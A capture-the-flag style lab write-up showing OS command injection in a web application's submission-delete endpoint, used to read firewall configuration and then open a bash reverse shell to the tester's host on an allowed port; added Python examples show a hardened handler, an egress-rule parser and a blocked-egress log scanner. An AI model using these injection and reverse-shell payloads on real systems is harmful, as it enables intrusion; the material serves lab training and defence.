OS Command Injection
The OS command injection vulnerability is present in the file parameter of the delete action of the /submissions/ endpoint of the target web application and has been confirmed at a later stage. However, due to the presence of a [Phobos_Subversion#todo|possible firewall], network-related commands have not been successful. Given that command execution is still possible and the output can be checked by writing it to a web-accessible directory, I can have a temporary "shell"
┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(id > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
real 0.08s
user 0.00s
sys 0.00s
cpu 10%
real 0.08s
user 0.00s
sys 0.00s
cpu 2%
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Like so
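The application side of this bug is not shown in the write-up, so the following is an added example of mine, not the Phobos application's code: the injectable pattern a delete handler typically has (user input spliced into a shell command line) next to a hardened version that validates the name, resolves it inside the submissions directory and unlinks the file without any shell. The directory path, function names and the temporary-directory demo are assumptions.

```python
import re
import subprocess
import tempfile
from pathlib import Path
from typing import Optional

# Assumed location of the submissions directory (the page only shows it as a
# writable, web-accessible path; the application's own configuration is not shown).
SUBMISSIONS_DIR = Path("/var/www/html/internal/submissions")

# Allow only a bare file name: no slashes, no shell metacharacters, no leading dot.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def delete_submission_vulnerable(name: str, base: Path = SUBMISSIONS_DIR) -> None:
    """Injectable pattern, shown for contrast only: the request parameter is
    interpolated into a command line that a shell parses, so a value such as
    $(id > out.txt) is evaluated by the shell before rm ever runs."""
    subprocess.run(f"rm {base}/{name}", shell=True, check=False)


def is_safe_name(name: str) -> bool:
    """True if `name` is a plain file name with no path or shell syntax."""
    return bool(SAFE_NAME.fullmatch(name)) and ".." not in name


def resolve_submission(name: str, base: Path) -> Optional[Path]:
    """Return the path inside `base` that `name` refers to, or None when the
    name fails validation or resolves (via traversal or symlink) outside `base`."""
    if not is_safe_name(name):
        return None
    base = base.resolve()
    target = (base / name).resolve()
    if target.parent != base:
        return None
    return target


def delete_submission_safe(name: str, base: Path = SUBMISSIONS_DIR) -> bool:
    """Hardened handler: validate, resolve, then unlink() directly.
    No shell is involved, so metacharacters are never interpreted."""
    target = resolve_submission(name, base)
    if target is None or not target.is_file():
        return False
    target.unlink()
    return True


def demo_roundtrip() -> dict:
    """Exercise the hardened handler on constructed input in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "report.pdf").write_text("constructed sample submission")
        return {
            "legit": delete_submission_safe("report.pdf", base),
            "injection": delete_submission_safe("$(id > out.txt)", base),
            "traversal": delete_submission_safe("../etc/passwd", base),
            "missing": delete_submission_safe("report.pdf", base),  # already removed
        }


if __name__ == "__main__":
    print(demo_roundtrip())
```

The allow-list on the file name is what closes the injection; resolving the path and comparing the parent directory is the second check, so that a name that passes the regex still cannot reach outside the submissions directory through a symlink.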
Firewall (ufw)
┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(cat /etc/default/ufw | grep -v '^#' > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
[...REDACTED...]
IPV6=yes
DEFAULT_INPUT_POLICY="DROP"
DEFAULT_OUTPUT_POLICY="DROP"
DEFAULT_FORWARD_POLICY="DROP"
DEFAULT_APPLICATION_POLICY="SKIP"
MANAGE_BUILTINS=no
IPT_SYSCTL=/etc/ufw/sysctl.conf
IPT_MODULES="nf_conntrack_ftp nf_nat_ftp nf_conntrack_netbios_ns"
The firewall (ufw) applies the sysctl settings in the /etc/ufw/sysctl.conf file when it starts, and its default policy for inbound, outbound and forwarded traffic is DROP, so only explicitly allowed traffic passes.
┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(ls -la /etc/ufw > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
[...REDACTED...]
total 56
drwxr-xr-x 3 root root 4096 Nov 5 2020 .
drwxr-xr-x 93 root root 4096 Feb 3 2021 ..
-rwxr-xr-x 1 root root 1126 Nov 5 2020 after.init
-rwxr-xr-x 1 root root 1004 Jan 26 2021 after.rules
-rwxr-xr-x 1 root root 915 Jan 26 2021 after6.rules
drwxr-xr-x 3 root root 4096 Jan 26 2021 applications.d
-rwxr-xr-x 1 root root 1130 Nov 5 2020 before.init
-rwxr-xr-x 1 root root 2537 Mar 25 2019 before.rules
-rwxr-xr-x 1 root root 6700 Mar 25 2019 before6.rules
-rwxr-xr-x 1 root root 1391 Aug 15 2017 sysctl.conf
-rwxr-xr-x 1 root root 313 Jan 26 2021 ufw.conf
-rwxr-xr-x 1 root root 1977 Jan 26 2021 user.rules
-rwxr-xr-x 1 root root 1611 Jan 26 2021 user6.rules
Checking the configuration directory of the firewall (ufw), /etc/ufw, lists a number of configuration files.
ufw.conf
┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(cat /etc/ufw/ufw.conf | grep -v '^#' > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
[...REDACTED...]
ENABLED=yes
LOGLEVEL=low
It is indeed enabled.
user.rules
┌──(kali㉿kali)-[~/…/phobos/svn/dev/users]
└─$ cmd='$(cat /etc/ufw/user.rules > /var/www/html/internal/submissions/out.txt)'; time curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete" | grep -i real ; curl http://192.168.104.131/internal/submissions/out.txt
[...REDACTED...]
*filter
:ufw-user-input - [0:0]
:ufw-user-output - [0:0]
:ufw-user-forward - [0:0]
:ufw-before-logging-input - [0:0]
:ufw-before-logging-output - [0:0]
:ufw-before-logging-forward - [0:0]
:ufw-user-logging-input - [0:0]
:ufw-user-logging-output - [0:0]
:ufw-user-logging-forward - [0:0]
:ufw-after-logging-input - [0:0]
:ufw-after-logging-output - [0:0]
:ufw-after-logging-forward - [0:0]
:ufw-logging-deny - [0:0]
:ufw-logging-allow - [0:0]
:ufw-user-limit - [0:0]
:ufw-user-limit-accept - [0:0]
### RULES ###
### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
### tuple ### allow any 27017 127.0.0.1 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 127.0.0.1 --dport 27017 -j ACCEPT
### tuple ### allow any 27017 172.17.0.2 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 172.17.0.2 --dport 27017 -j ACCEPT
### tuple ### allow tcp 6000:6007 0.0.0.0/0 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
### END RULES ###
### LOGGING ###
-A ufw-after-logging-input -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-A ufw-after-logging-output -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-A ufw-after-logging-forward -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-I ufw-logging-deny -m conntrack --ctstate INVALID -j RETURN -m limit --limit 3/min --limit-burst 10
-A ufw-logging-deny -j LOG --log-prefix "[UFW BLOCK] " -m limit --limit 3/min --limit-burst 10
-A ufw-logging-allow -j LOG --log-prefix "[UFW ALLOW] " -m limit --limit 3/min --limit-burst 10
### END LOGGING ###
### RATE LIMITING ###
-A ufw-user-limit -m limit --limit 3/minute -j LOG --log-prefix "[UFW LIMIT BLOCK] "
-A ufw-user-limit -j REJECT
-A ufw-user-limit-accept -j ACCEPT
### END RATE LIMITING ###
COMMIT
The user.rules file is the file that gets generated when firewall rules are added by the end user.
The following rules are present:
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
- Accepting inbound TCP packets to port 80
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
- Accepting outbound TCP packets to the 127.0.0.1:27017 socket
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
- Accepting outbound TCP packets to the 172.17.0.2:27017 socket (Docker host?)
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
- Accepting outbound TCP packets to destination ports 6000 through 6007
- This is the entry point
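Reading the rules by hand works for a short file; on a host with many rules the question a defender wants answered is "which outbound destinations does this firewall let a compromised service reach?". The following is an added example of mine, not part of the write-up, that parses the `### tuple ###` bookkeeping lines ufw writes into user.rules and reports the egress allowances. The sample input is the rule block quoted above; the field order (action, protocol, destination port, destination, source port, source, direction) is how ufw writes these lines, and the function names are my own.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed sample: the ### tuple ### section of the user.rules dump shown above.
USER_RULES = """\
### RULES ###
### tuple ### allow tcp 80 0.0.0.0/0 any 0.0.0.0/0 in
-A ufw-user-input -p tcp --dport 80 -j ACCEPT
### tuple ### allow any 27017 127.0.0.1 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 127.0.0.1 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 127.0.0.1 --dport 27017 -j ACCEPT
### tuple ### allow any 27017 172.17.0.2 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -d 172.17.0.2 --dport 27017 -j ACCEPT
-A ufw-user-output -p udp -d 172.17.0.2 --dport 27017 -j ACCEPT
### tuple ### allow tcp 6000:6007 0.0.0.0/0 any 0.0.0.0/0 out
-A ufw-user-output -p tcp -m multiport --dports 6000:6007 -j ACCEPT
### END RULES ###
"""

# action proto dport dst sport src direction (extra fields such as interface are ignored)
TUPLE_RE = re.compile(r"^### tuple ###\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)")
FIELDS = ("action", "proto", "dport", "dst", "sport", "src", "direction")


def parse_tuples(text: str) -> List[Dict[str, str]]:
    """Turn each '### tuple ###' line into a dict keyed by FIELDS."""
    rules = []
    for line in text.splitlines():
        m = TUPLE_RE.match(line)
        if m:
            rules.append(dict(zip(FIELDS, m.groups())))
    return rules


def port_range(spec: str) -> Tuple[int, int]:
    """'any' -> whole range, '6000:6007' -> (6000, 6007), '80' -> (80, 80)."""
    if spec == "any":
        return (0, 65535)
    lo, _, hi = spec.partition(":")
    return (int(lo), int(hi) if hi else int(lo))


def egress_allowances(text: str) -> List[Dict[str, str]]:
    """Only the rules that accept locally generated traffic leaving the host."""
    return [r for r in parse_tuples(text) if r["direction"] == "out" and r["action"] == "allow"]


def unrestricted_egress_ports(text: str) -> List[int]:
    """Destination ports reachable at *any* address: the allowances worth reviewing,
    because a compromised process can use them to call out."""
    ports = set()
    for r in egress_allowances(text):
        if ipaddress.ip_network(r["dst"], strict=False).prefixlen == 0:
            lo, hi = port_range(r["dport"])
            ports.update(range(lo, hi + 1))
    return sorted(ports)


def egress_allowed(text: str, dst: str, port: int, proto: str = "tcp") -> bool:
    """Would an outbound `proto` packet to dst:port be accepted by the user rules?"""
    addr = ipaddress.ip_address(dst)
    for r in egress_allowances(text):
        if r["proto"] not in ("any", proto):
            continue
        if addr not in ipaddress.ip_network(r["dst"], strict=False):
            continue
        lo, hi = port_range(r["dport"])
        if lo <= port <= hi:
            return True
    return False


if __name__ == "__main__":
    print("egress to any host on ports:", unrestricted_egress_ports(USER_RULES))
```

With a DROP default output policy, every port outside the list returned by `unrestricted_egress_ports` is blocked for any non-local destination; running this against a host's user.rules during a review shows at a glance whether the allowed range is intentional or a leftover, as the 6000:6007 range here appears to be.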
Exploitation
Given that the target system accepts outbound TCP packets to destination ports 6000 through 6007, I can use one of those ports to start a shell session.
This also explains why the network-related commands failed previously.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ cmd='$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.218%2F6000%200%3E%261)'; curl -s -X POST http://internal-phobos.phobos.offsec/submissions/ -H 'Content-Type: application/x-www-form-urlencoded' -b 'csrftoken=Mzge3HqUkskMhLrCgOg6Sm36tAYAJmJDIg00kNXey0c1RuuHoRfWUy0Gmo7lt8ML; sessionid=xq2mlknhlq6qaxbski9h52okwmq4c1dj' --data-binary "csrfmiddlewaretoken=PuG5TIGZ30vR3gnYCGKsS8gdatHhuq2pLbqRaOdjhyn6DZq3KJJiUkdN3hQ2ec5x&file=$cmd&action=delete"
Sending the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/phobos]
└─$ nnc 6000
listening on [any] 6000 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.104.131] 33736
bash: cannot set terminal process group (1194): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:83:3a:8b:3f brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:83ff:fe3a:8b3f/64 scope link
valid_lft forever preferred_lft forever
5: vethc812e22@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether b2:18:64:f5:36:86 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::b018:64ff:fef5:3686/64 scope link
valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:3d:17 brd ff:ff:ff:ff:ff:ff
inet 192.168.104.131/24 brd 192.168.104.255 scope global ens192
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the www-data account via OS command injection.
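From the defender's side, the earlier failed network commands were not silent: the logging rules in user.rules tag every packet dropped by the OUTPUT chain with the "[UFW BLOCK]" prefix, and a locally generated packet shows up with OUT= set and IN= empty. The following is an added example of mine, not part of the write-up, that scans such log lines and counts blocked outbound attempts per destination, which is a cheap indicator that a service account on the web host is trying to reach out. The log lines are constructed in the netfilter LOG format ufw uses, with the addresses from this write-up; the function names are my own.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample lines in the format ufw's LOG rules produce in the kernel log.
SAMPLE_LOG = """\
Feb  3 12:00:01 ubuntu kernel: [UFW BLOCK] IN= OUT=ens192 SRC=192.168.104.131 DST=192.168.45.218 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=TCP SPT=40001 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0
Feb  3 12:00:02 ubuntu kernel: [UFW BLOCK] IN= OUT=ens192 SRC=192.168.104.131 DST=192.168.45.218 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=2 DF PROTO=TCP SPT=40002 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0
Feb  3 12:00:03 ubuntu kernel: [UFW BLOCK] IN= OUT=ens192 SRC=192.168.104.131 DST=192.168.45.218 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=3 DF PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Feb  3 12:00:04 ubuntu kernel: [UFW BLOCK] IN=ens192 OUT= MAC=00:50:56:9e:3d:17:00:11:22:33:44:55:08:00 SRC=192.168.45.218 DST=192.168.104.131 LEN=40 TOS=0x00 PREC=0x00 TTL=64 ID=4 PROTO=TCP SPT=55555 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
"""

KV_RE = re.compile(r"\b([A-Z]+)=(\S*)")


def parse_block_line(line: str) -> Optional[Dict[str, str]]:
    """Return the KEY=value fields of a '[UFW BLOCK]' line, or None for other lines.
    Bare flags such as DF or SYN carry no '=' and are ignored."""
    marker = "[UFW BLOCK]"
    if marker not in line:
        return None
    return dict(KV_RE.findall(line.split(marker, 1)[1]))


def egress_drops(log_text: str, local_src: str) -> Counter:
    """Count dropped outbound packets per (dst, proto, dport) that the host itself
    generated: OUT= is set and IN= is empty only for locally originated traffic."""
    counter: Counter = Counter()
    for line in log_text.splitlines():
        f = parse_block_line(line)
        if not f or not f.get("OUT") or f.get("IN"):
            continue
        if f.get("SRC") != local_src:
            continue
        counter[(f.get("DST"), f.get("PROTO"), f.get("DPT", "-"))] += 1
    return counter


def suspicious_egress(log_text: str, local_src: str, threshold: int = 2) -> List[Tuple[Tuple[str, str, str], int]]:
    """Destinations the host repeatedly tried and failed to reach."""
    return [(key, n) for key, n in egress_drops(log_text, local_src).items() if n >= threshold]


if __name__ == "__main__":
    for key, n in suspicious_egress(SAMPLE_LOG, "192.168.104.131"):
        print(f"{n}x blocked egress to {key[0]} {key[1]}/{key[2]}")
```

A web server that only ever answers inbound requests has no reason to open outbound connections to arbitrary hosts, so even a handful of OUTPUT-chain drops from its address is worth an alert; the count per destination separates a one-off from a script retrying, and the inbound line in the sample is correctly left out of the tally.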